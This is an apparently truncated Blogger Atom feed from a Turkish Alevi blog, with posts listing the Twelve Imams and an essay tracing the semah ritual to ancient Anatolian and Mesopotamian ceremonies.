<?xml version='1.0' encoding='UTF-8'?><?xml-stylesheet href="http://www.blogger.com/styles/atom.css" type="text/css"?><feed xmlns='http://www.w3.org/2005/Atom' xmlns:openSearch='http://a9.com/-/spec/opensearchrss/1.0/' xmlns:georss='http://www.georss.org/georss' xmlns:gd='http://schemas.google.com/g/2005' xmlns:thr='http://purl.org/syndication/thread/1.0'><id>tag:blogger.com,1999:blog-5255043838959294624</id><updated>2011-04-21T20:57:47.383+02:00</updated><title type='text'>Gelin Canlar Bir Olalım</title><subtitle type='html'></subtitle><link rel='http://schemas.google.com/g/2005#feed' type='application/atom+xml' href='http://ynlzbn.blogspot.com/feeds/posts/default'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5255043838959294624/posts/default?max-results=100'/><link rel='alternate' type='text/html' href='http://ynlzbn.blogspot.com/'/><link rel='hub' href='http://pubsubhubbub.appspot.com/'/><author><name>ynlzbn</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='32' src='http://img504.imageshack.us/img504/299/130x130424566546vd6.jpg'/></author><generator version='7.00' uri='http://www.blogger.com'>Blogger</generator><openSearch:totalResults>30</openSearch:totalResults><openSearch:startIndex>1</openSearch:startIndex><openSearch:itemsPerPage>100</openSearch:itemsPerPage><entry><id>tag:blogger.com,1999:blog-5255043838959294624.post-8131376790071456136</id><published>2009-02-05T21:07:00.005+02:00</published><updated>2009-02-05T21:24:28.924+02:00</updated><title type='text'>12 İmamların İsimleri</title><content type='html'>&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://sivsbahadun.googlepages.com/12imam.jpg"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 488px; height: 354px;" src="http://sivsbahadun.googlepages.com/12imam.jpg" alt="" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;h2  style="text-align: center;font-family:courier new;"&gt;&lt;span style="font-weight: bold;font-size:85%;" &gt;&lt;span style="color: rgb(51, 51, 255);"&gt;&lt;span style="color: rgb(102, 102, 102);"&gt;1.Hz. Ali&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/h2&gt;&lt;h2  style="text-align: center;font-family:courier new;"&gt;&lt;span style="font-weight: bold;font-size:85%;" &gt;&lt;span style="color: rgb(51, 51, 255);"&gt;&lt;span style="color: rgb(102, 102, 102);"&gt;&lt;br /&gt;2.Hz. Hasan&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/h2&gt;&lt;h2  style="text-align: center;font-family:courier new;"&gt;&lt;span style="font-weight: bold;font-size:85%;" &gt;&lt;span style="color: rgb(51, 51, 255);"&gt;&lt;span style="color: rgb(102, 102, 102);"&gt;&lt;br /&gt;3.Hz. Hüseyin&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/h2&gt;&lt;h2  style="text-align: center;font-family:courier new;"&gt;&lt;span style="font-weight: bold;font-size:85%;" &gt;&lt;span style="color: rgb(51, 51, 255);"&gt;&lt;span style="color: rgb(102, 102, 102);"&gt;&lt;br /&gt;4.Hz. Zeynel Abidin&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/h2&gt;&lt;h2  style="text-align: center;font-family:courier new;"&gt;&lt;span style="font-weight: bold;font-size:85%;" &gt;&lt;span style="color: rgb(51, 51, 255);"&gt;&lt;span style="color: rgb(102, 102, 102);"&gt;&lt;br /&gt;5.Hz. Muhammed Bakır&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/h2&gt;&lt;h2  style="text-align: center;font-family:courier new;"&gt;&lt;span style="font-weight: bold;font-size:85%;" &gt;&lt;span style="color: rgb(51, 51, 255);"&gt;&lt;span style="color: rgb(102, 102, 102);"&gt;&lt;br /&gt;6.Hz. Cafer'i Sadık&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/h2&gt;&lt;h2  style="text-align: center;font-family:courier new;"&gt;&lt;span style="font-weight: bold;font-size:85%;" &gt;&lt;span style="color: rgb(51, 51, 255);"&gt;&lt;span style="color: rgb(102, 102, 102);"&gt;&lt;br /&gt;7.Hz. Musa Kazım&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/h2&gt;&lt;h2  style="text-align: center;font-family:courier new;"&gt;&lt;span style="font-weight: bold;font-size:85%;" &gt;&lt;span style="color: rgb(51, 51, 255);"&gt;&lt;span style="color: rgb(102, 102, 102);"&gt;&lt;br /&gt;8.Hz. Ali Rıza&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/h2&gt;&lt;h2  style="text-align: center;font-family:courier new;"&gt;&lt;span style="font-weight: bold;font-size:85%;" &gt;&lt;span style="color: rgb(51, 51, 255);"&gt;&lt;span style="color: rgb(102, 102, 102);"&gt;&lt;br /&gt;9.Hz. Muhammed Taki&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/h2&gt;&lt;h2  style="text-align: center;font-family:courier new;"&gt;&lt;span style="font-weight: bold;font-size:85%;" &gt;&lt;span style="color: rgb(51, 51, 255);"&gt;&lt;span style="color: rgb(102, 102, 102);"&gt;&lt;br /&gt;10.Hz. Ali Naki&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/h2&gt;&lt;h2  style="text-align: center;font-family:courier new;"&gt;&lt;span style="font-weight: bold;font-size:85%;" &gt;&lt;span style="color: rgb(51, 51, 255);"&gt;&lt;span style="color: rgb(102, 102, 102);"&gt;&lt;br /&gt;11.Hz. Hasan Askeri&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/h2&gt;&lt;h2 style="text-align: center;"&gt;&lt;span style="font-weight: bold;"&gt;&lt;span style="color: rgb(51, 51, 255);"&gt;&lt;span style="color: rgb(102, 102, 102);font-family:courier new;font-size:85%;"  &gt;&lt;br /&gt;12.Hz.Muhammed Mehdi&lt;/span&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;/h2&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5255043838959294624-8131376790071456136?l=ynlzbn.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://ynlzbn.blogspot.com/feeds/8131376790071456136/comments/default' title='Kayıt Yorumları'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=5255043838959294624&amp;postID=8131376790071456136' title='0 Yorum'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5255043838959294624/posts/default/8131376790071456136'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5255043838959294624/posts/default/8131376790071456136'/><link rel='alternate' type='text/html' href='http://ynlzbn.blogspot.com/2009/02/12-imamlarn-iimleri.html' title='12 İmamların İsimleri'/><author><name>ynlzbn</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='32' src='http://img504.imageshack.us/img504/299/130x130424566546vd6.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5255043838959294624.post-3625468660207600776</id><published>2008-01-26T22:38:00.000+02:00</published><updated>2008-01-26T22:39:03.140+02:00</updated><title type='text'>Semahın Tarihi Kökeni</title><content type='html'>&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://www.turkishjournal.com/images/semah1.JPG"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 320px;" src="http://www.turkishjournal.com/images/semah1.JPG" alt="" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;div style="text-align: center;"&gt;&lt;span style="font-size:85%;"&gt;&lt;b&gt;&lt;i&gt;Semahın Tarihi Kökeni&lt;/i&gt;&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-size:85%;"&gt;&lt;b&gt;&lt;i&gt;Alevilik ve Bektaşilik’teki semah ile Mevlevilerde gördüğümüz sema ayinleri Antikçağ’dan çıkıp gelen dinsel tören ve şölenlerin bir devamıdır. En eski dans figürlerine Çatalhöyük’te rastlandı. 1956 yılında James Mellaart’ın keşfettiği bu site Neolitik çağa ait bilgileri bizlere ulaştırdı.Çatalhöyük İ.Ö. 6500 ile 5000Yıllarına tarihleniyor. İşte bu yerleşim merkezinde ele geçen frekslerin birisinde kimi figürlerin dans eden biçimde olması dikkati çekti. Meallaart bu dansların av öncesi –avın bereketli sonuçlanması için-yapılan dinsel törenlerde yapıldığını söyler.&lt;/i&gt;&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-size:85%;"&gt;&lt;b&gt;&lt;i&gt;V.D. Hably de Antikçağ’la ilgili yaptığı araştırmalarda toplumsal ve büyüsel ritüeller içinde yer alan saz-söz ve oyundan oluşan bu gösterilerin sergilenmesindeki amaçları şöyle özetler: “Doğumla ilgili olanlar,genç erkek ve kızları eriştirme törenleri,evlenme,gizli inanç törenleri,savaş ve kahramanlık yüreklendirmeleri,dinsel erekler içinde Tanrı’ya,Güneş’e,Ay’a,ateşe,atalara iyi ve bol avlanmaya,şeytani,kötü ruhları ve cinleri kovmaya, cenazeleri defnetmeye yönelik gösteriler yumağı...”&lt;/i&gt;&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-size:85%;"&gt;&lt;b&gt;&lt;i&gt;Kalkolitik çağa indiğimiz zaman bu dinsel ve yaşamsal faktörlerle ilgili törenlere ait bilgileri Gudea döneminde yapılan Zagmuk törenlerinde buluyoruz. Zagmuk da Newroz gibi “Yeni Gün” anlamına geliyor ve gece ile gündüzün eşit olduğu 21 Mart’ta kutlanıyordu. Baharın başlangıcı,bolluk ile yeni yıla başlama törenleriydi yapılanlar... Danimarkalı Antikçağ tarihçisi Arthur Chirstensen’in kitabelerden ve yazılı kil tabletlerden çıkardığı sonuçlara göre bu bayramın tarihi günümüzden 4334 yıl kadar öncesine gitmekte. Bu bayramda ülkenin kralı, marduk heykelinin elini tutar. Böylece hem baş tanrıya hem de ona bağlı tanrılara saygısını bağlılığını kanıtlamış olurdu. Bu törende baş Tanrı Marduk tüm diğer tanrılara kral ve tabasına yardım etmeleri için gerekli emri verirdi. Tapınakta ve çevrede ateşler yakılır müzik eşliğinde oyunlar oynanır,şiirler okunurdu. Yine Antikçağ tarihçilerinden C.Brockelman’da baş tanrının karşısında diğer tanrıların baş eğip selam durmalarının, el bağlamalarının Yezidi Kürtler’de Melek-Tavus’a saygı olarak aynen korunduğunu açıklar. Arthur Christensen de aynı düşüncededir. İcra edilen müzikli oyunun Yezidlerde Sersal olarak adlandırılan yeni yılda uygulanış ve sergileniş biçiminin günümüzden 4334 yıl önceki törenlere tıpa tıp uyduğunu açıklarlar. Fransızca olan metinde benzerliğin ötesinde tıpa tıp aynısı olduğu şöyle ifade edilmiştir:”Chez Les Yezidis ce n’est pas seulement la sig nification mytholojique de la fete de I’anqui,est la même que celle du ZAGMUK Babylonien” anlamı şu: Yezidlerdeki yeni yıl bayramı Zagmuk bayramının mitolojik bir uzantısı olmayıp tıpa tıp aynısıdır.&lt;/i&gt;&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-size:85%;"&gt;&lt;b&gt;&lt;i&gt;Bu yazarlar Yezidlikte olduğu gibi Zerdüşt inancında da diğer tanrıların Ahura Mazda başkanlığında Newroz günü toplandıklarını açıklamaktadırlar. Vendidat’ın 2 numaralı bölümünü bu savları için kaynakça gösterirler. Yima’da bu törende hazırdır ve geleneğe göre gece ve gündüzün eşit olduğu bir bahar günü Newroz’u “gerçekleştirir” sunar.&lt;/i&gt;&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-size:85%;"&gt;&lt;b&gt;&lt;i&gt;Ancak aynı yazarlar Avesta’da bu törenin yeni yıl bayramı olarak bu isim altında sözünün edilmiş olmasını “yaratıldığı günden beri yılın ilk gününü belirlemenin büyük krallara ait olmasından kaynaklandığını öne sürerek açıklamaya çalışırlar.&lt;/i&gt;&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-size:85%;"&gt;&lt;b&gt;&lt;i&gt;Semah’ın tarihi kökenini araştırırken Hititler dönemine de eğilmek istiyorum. Boğazköy’de ele geçen bol miktardaki kil tabletlerin çözümü konumuza ışık tutacak ve aydınlatacak niteliktedir.&lt;/i&gt;&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-size:85%;"&gt;&lt;b&gt;&lt;i&gt;Biz semahı incelerken mabetlerde yapılan dinsel şölenlerin sunuluş biçimini, içeriğini, uygulanan kuralları ele alacağız. Böylece günümüze Antikçağ’dan çıkıp gelen benzerlikler zaten kendiliğinden ortaya çıkacak. Şölen ve bu şölende yapılan dans,oyun,gösteriler bunları yönetenler,şölenlerin hangi nedenle ve kimler için yapıldığı,beklenenin ne olduğu öğrenildiğinde günümüzdeki semah ve sema’nın da kökenine inmiş olacağız.&lt;/i&gt;&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-size:85%;"&gt;&lt;b&gt;&lt;i&gt;Şimdi inceleyeceğimiz Hitit Panteonuna ait dinsel törenlerin tümünün Hurri uygarlığından bu halka intikal ettiği artık kesinleşti. R.North,Robert Statlender, Doçent Dr. Ali M. Dinçol yazdıkları eserlerde bu gerçeğe değinmemişlerdir. Bize göre de Gudea döneminden aşağıya inerken İ.Ö. 2 binli yıllarda Zağros yöresinde atalarından gelen uygarlığı kendi ardılları olan Mitanniler ve Urartular aracılığıyla binli yıllara taşıtan bu halk,mabet töreleri,dans,oyun ve mitoslar açısından çok zengin bir perspektif sunmuştur. Bu şölen gelenekleri Medlere kadar uzanır gider. Hititler döneminde mabette kutlanan Kapı Yapısı Bayramı,Yenı yıl bayramı, Hışuva bayramı önemli olanlardandır. Bunların yanı sıra orak bayramı,bağbozumu bayramı,harman bayramı gibi tarımla ilgili olanlarda sayılabilir. Bayramların bir çoğu Kral yada yakını olanlardan birisinin başkanlığında kutlanır. Tapınak yönetmenliklerinde temizlikle ilgili konulara çok önem verilmiştir. Kadınlarla cinsel ilişkide bulunmak tinsel açıdan kirlenmeye yol açar. Görevliler buna çok dikkat etmek zorundadır. Kişi yada kişiler güneş doğar doğmaz yıkanmalı ve sabahleyin tanrıların kahvaltılarında hazır olmalıdırlar. Kim bir kadınla yatarsa ve amirleri onu sorguya çektiklerinde doğruyu söylemek zorundadır. O na söyleyemezse bir arkadaşına söyleyecek ve kesin olarak yıkanacaktır. Fakat kasıtlı olarak yıkanmaz ve kirli bir durumda Tanrı ya ve O na sunulan kurban ekmeklerine,içki kaplarına yaklaşırsa bunu gören arkadaşı da durumu gizleyip de olay sonradan öğrenilirse her ikiside idam edilir.&lt;/i&gt;&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-size:85%;"&gt;&lt;b&gt;&lt;i&gt;Hurrilerden Hittitlere geçen bu kural Gudea zamanındaki Zagmuk törenlerini tıpatıp uyguladığını açıkladığımız Yezidi Kürtlerde de bu temizlik koşulu ile karşılaşırız.&lt;/i&gt;&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-size:85%;"&gt;&lt;b&gt;&lt;i&gt;“Sersal ( Yeni Yılı ) kutlamak için Şeyh Addi nin türbesinde toplanan yezidi cemaati adak etini (Kabduş) yemeden önce türbenin altından geçen Zemzem suyunda yıkanırlar.”&lt;/i&gt;&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-size:85%;"&gt;&lt;b&gt;&lt;i&gt;Tarihci A.H.Layard da Kürdistan da yaptığı bir inceleme gezisinde temizlik konusunda şu izlenimini dile getirir:&lt;/i&gt;&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-size:85%;"&gt;&lt;b&gt;&lt;i&gt;“Yezidi kasabasının varoşlarında kadınları ana dere içinde yıkanırlarken gördüm. Ertesi gün yapılacak törene hazırlanıyorlardı. Çünkü hiç kimse Şeyh Addi Türbesine bedenini ve elbiselerini temizlemeden giremez. Beni görmedikleri için tamamen soyunmuş olmalarına rağmen çekincesiz gezinmekteydiler. Erkekler ise gündüz derenin bir başka yerinde yıkanmışlardı”&lt;/i&gt;&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-size:85%;"&gt;&lt;b&gt;&lt;i&gt;Zerdüştlerde de düzenlen tören ve dinsel şölenlerde görevliler ve törene katılanlar temizlenmek zorundadırlar. Zerdüştler ayrıca nefesin ateşi kirlettiklerine inandıklarından ağızlarına bez bağlarlar.&lt;/i&gt;&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-size:85%;"&gt;&lt;b&gt;&lt;i&gt;Hititler döneminde yapılacak törende kral ve kraliçe özel tören giysilerini giyerler. Özel bölümde yer alırlar.&lt;/i&gt;&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-size:85%;"&gt;&lt;b&gt;&lt;i&gt;Bugün ki deyimi ile mutrıp kurulu yani müzik aletlerini çalanlar kral ve kraliçenin önünde ve ardında fasıla başlarlar. Dansçılar ellerini yukarı kaldırır sonra oldukları yerde çark atarlar (dönerler). İlahiler okunur.&lt;/i&gt;&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-size:85%;"&gt;&lt;b&gt;&lt;i&gt;Törenin önemli bölümlerinden biriside dini yemek faslıdır. Yemek işinde dini kurallar titizlikle uygulanır. Sofrada dem alınır. Dinsel yemek görevlileri ise sofracı,süpürücü,içki sunucu ve haberciden oluşur. İlahi okuyanlar,şarkı söyleyenler,çalgıcılar ve dansçıların özel giysileri içinde geçit töreni yaparlar.&lt;/i&gt;&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-size:85%;"&gt;&lt;b&gt;&lt;i&gt;Alevilik ve Bektaşilikte semah yapanların özel giysi giymeleri zorunluluğu yoktur.&lt;/i&gt;&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-size:85%;"&gt;&lt;b&gt;&lt;i&gt;Cem ve Sema törenlerinde de tanrının yakını olan kralın yerini dede ve postnişin almıştır. Dinsel tören yemeği bu felsefelerde de vardı. Semah ve Sema dan sonra yenen yemeğe Mevlevilikte Sumak. Alevilikte Sımat adı verilir. Yezidiler ise “kabduş” demektedirler. Aynı gelenek Zerdüştilerde de karşımıza çıkar.&lt;/i&gt;&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-size:85%;"&gt;&lt;b&gt;&lt;i&gt;Aşure geleneği de dinsel yemek törenlerinin bir uzantısıdır.&lt;/i&gt;&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-size:85%;"&gt;&lt;b&gt;&lt;i&gt;Biz yazımızda Semahın da içinde yer aldığı bir ritüeli temellerine inerek –Semahın da bir parçasını oluşturduğu – bu şölenin eskiliğine işaret etmiş olduk.&lt;/i&gt;&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-size:85%;"&gt;&lt;b&gt;&lt;i&gt;Şimdide semahın içeriği, amacı, biçimi üzerinde durmak istiyoruz.&lt;/i&gt;&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-size:85%;"&gt;&lt;b&gt;&lt;i&gt;Büyük zaman ve dıştan gelen etkiler sonucu değişmelerede uğramıştır.&lt;/i&gt;&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-size:85%;"&gt;&lt;b&gt;&lt;i&gt;Nitekim islamiyetin anadoluda yayılması ve bu dinin aldığı sert önlemler yüzünden semah – islamiyette çalgı,çengi, dem ve dans yasak olmasına karşın – islami bir şalı üzerine çekmek zorunda kalmış ve böylece varlığını koruyabilmiştir. Zerdüştlüğün,Yezidiliğin ve Sabiiliğin yarattığı tasavvuf (BİR OLMA yani birsellik) düşüncesi halk müslümanlığı ile bütünleştirilerek devlet müslümanlığına karşı çıkılmış;bu yüzden de pek çok alevi canlarının kanları akıtılmışsa da sonuçta bu günlere gelinebilmiştir. Eğer alevilik direnci olmasaydı biz ülkede,yöneticilerin kendilerini tanrının gölgesi sayma ve bu yolda bağnaz gerici uygulamaları ile özgür düşünceyi tümü ile ortadan kaldırmış olacaklarını düşünmekteyiz.&lt;/i&gt;&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-size:85%;"&gt;&lt;b&gt;&lt;i&gt;Semah sanıldığı gibi oyun olmadığını önceki yazılarımızda anlatmıştık. Hünkar Hacı Bektaşa göre;&lt;/i&gt;&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-size:85%;"&gt;&lt;b&gt;&lt;i&gt;SEMAH ARİFLERİN ALETİ&lt;/i&gt;&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style="font-size:85%;"&gt;&lt;b&gt;&lt;i&gt;MUHİPLERİN İBADETİ&lt;/i&gt;&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style="font-size:85%;"&gt;&lt;b&gt;&lt;i&gt;TALİPLERİN MAKSUDUDUR&lt;/i&gt;&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style="font-size:85%;"&gt;&lt;b&gt;&lt;i&gt;İLAHİ BİR SIRDIR&lt;/i&gt;&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style="font-size:85%;"&gt;&lt;b&gt;&lt;i&gt;O KİMSE Kİ SEMAHI BİR OYUN SANIR&lt;/i&gt;&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style="font-size:85%;"&gt;&lt;b&gt;&lt;i&gt;O CİFE DİR.&lt;/i&gt;&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-size:85%;"&gt;&lt;b&gt;&lt;i&gt;Mevlana da bir rubaisinde sema için şunları söyler;&lt;/i&gt;&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-size:85%;"&gt;&lt;b&gt;&lt;i&gt;YÜCESİN NUR GİBİSİN BİLKİ BÜTÜN SIR SENDE&lt;/i&gt;&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style="font-size:85%;"&gt;&lt;b&gt;&lt;i&gt;BİR EKİN AŞKIN İLE GİT GİDE YÜZ OLMADAYIM&lt;/i&gt;&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style="font-size:85%;"&gt;&lt;b&gt;&lt;i&gt;SEN SEN OLDUKÇA SEMA ETMEKTEYİM ÇEVRENDE&lt;/i&gt;&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style="font-size:85%;"&gt;&lt;b&gt;&lt;i&gt;BEN SEN OLDUKÇADA ÇEVREMDE DÖNÜP DURMADAYIM&lt;/i&gt;&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-size:85%;"&gt;&lt;b&gt;&lt;i&gt;Bu iki bilginin de ortak görüşü semahın Tanrı ile bütünleşme,O nun zerresi haline gelme yani vahdaniyetin özü olduğu noktasında odaklaşıyor. Semah,bir coşku ve cezbe aracıdır. Müzik ve raks aracılığı ile kişi manevi bir alemde geziye çıkmaktadır.&lt;/i&gt;&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-size:85%;"&gt;&lt;b&gt;&lt;i&gt;Ünlü İpek Yolu filmini çeken rejisör Omara nın da bir japon olarak sema törenini Konya da izledikten sonra bize anlattıkları bundan hiç farklı değildi.&lt;/i&gt;&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-size:85%;"&gt;&lt;b&gt;&lt;i&gt;Semah ve Sema yalnız bu özelliği ile değil, şiirin,müziğin ve raksın,yaşaması gelişmesi ve boyutlanmasında da büyük yarar sağlamıştır.&lt;/i&gt;&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5255043838959294624-3625468660207600776?l=ynlzbn.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://ynlzbn.blogspot.com/feeds/3625468660207600776/comments/default' title='Kayıt Yorumları'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=5255043838959294624&amp;postID=3625468660207600776' title='1 Yorum'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5255043838959294624/posts/default/3625468660207600776'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5255043838959294624/posts/default/3625468660207600776'/><link rel='alternate' type='text/html' href='http://ynlzbn.blogspot.com/2008/01/semahn-tarihi-kkeni.html' title='Semahın Tarihi Kökeni'/><author><name>ynlzbn</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='32' src='http://img504.imageshack.us/img504/299/130x130424566546vd6.jpg'/></author><thr:total>1</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5255043838959294624.post-7427788253024245263</id><published>2008-01-09T12:33:00.000+02:00</published><updated>2008-01-22T02:22:29.407+02:00</updated><title type='text'>Gelin Canlar Bir Olalım</title><content type='html'>&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://www.koerdistan.nl/webcards/images/image-3ff582681e4c3a6ea0e5210c5cce065a-Ali.jpg"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 320px;" src="http://www.koerdistan.nl/webcards/images/image-3ff582681e4c3a6ea0e5210c5cce065a-Ali.jpg" alt="" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;a href="http://img225.imageshack.us/img225/2972/photo31df8.jpg"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer;" src="http://img225.imageshack.us/img225/2972/photo31df8.jpg" alt="" id="BLOGGER_PHOTO_ID_5153424149583851842" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;a href="http://www.pirsultanabdal.de/image008.gif"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer;" src="http://www.pirsultanabdal.de/image008.gif" alt="" id="BLOGGER_PHOTO_ID_5153423934835487026" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;strong&gt;GELİN CANLAR BİR OLALIM&lt;/strong&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5255043838959294624-7427788253024245263?l=ynlzbn.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5255043838959294624/posts/default/7427788253024245263'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5255043838959294624/posts/default/7427788253024245263'/><link rel='alternate' type='text/html' href='http://ynlzbn.blogspot.com/2008/01/kardeim-gizli-sorunu-deitir.html' title='Gelin Canlar Bir Olalım'/><author><name>ynlzbn</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='32' src='http://img504.imageshack.us/img504/299/130x130424566546vd6.jpg'/></author></entry><entry><id>tag:blogger.com,1999:blog-5255043838959294624.post-7215361154318072048</id><published>2007-07-06T09:21:00.000+02:00</published><updated>2008-01-22T02:24:26.938+02:00</updated><title type='text'></title><content type='html'>&lt;a href="http://bolukkaya.phpbb24.com"&gt;&lt;blink&gt;&lt;b style="color: red;"&gt;BİZİMLE ÇALIŞMAK İSTER MİSİNİZ?&lt;/b&gt;&lt;/blink&gt;&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5255043838959294624-7215361154318072048?l=ynlzbn.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://ynlzbn.blogspot.com/feeds/7215361154318072048/comments/default' title='Kayıt Yorumları'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=5255043838959294624&amp;postID=7215361154318072048' title='0 Yorum'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5255043838959294624/posts/default/7215361154318072048'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5255043838959294624/posts/default/7215361154318072048'/><link rel='alternate' type='text/html' href='http://ynlzbn.blogspot.com/2007/07/bizimle-alimak-ister-misiniz-input.html' title=''/><author><name>ynlzbn</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='32' src='http://img504.imageshack.us/img504/299/130x130424566546vd6.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5255043838959294624.post-6979311148136721031</id><published>2007-05-01T12:17:00.000+02:00</published><updated>2007-05-02T10:18:05.643+02:00</updated><title type='text'>nil 